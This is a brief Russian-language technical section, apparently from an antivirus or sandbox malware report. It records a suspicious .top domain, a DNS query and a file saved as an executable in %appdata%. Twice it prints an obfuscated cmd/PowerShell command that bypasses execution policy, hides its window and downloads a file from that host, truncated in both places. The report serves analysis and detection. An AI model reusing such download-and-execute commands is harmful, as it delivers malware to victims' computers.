Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^Wer^SHell^.EXE -eX^EC^UT^IOn^p^Ol^icY byp^Ass^ -n^O^PROfi^le -w^INDO^wStyL^e H^I^dDE^n (N^Ew-OBJ^ECt sYS^TE^M.^Net.WEBclie^N^t).^d^O^Wn^L^O^Ad^FilE('http://www.fopeioaas...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "Po^Wer^SHell^.EXE -eX^EC^UT^IOn^p^Ol^icY byp^Ass^ -n^O^PROfi^le -w^INDO^wStyL^e H^I^dDE^n (N^Ew-OBJ^ECt sYS^TE^M.^Net.WEBclie^N^t).^d^O^Wn^L^O^Ad^FilE('http://www.fopeioaas...' (со скрытым окном)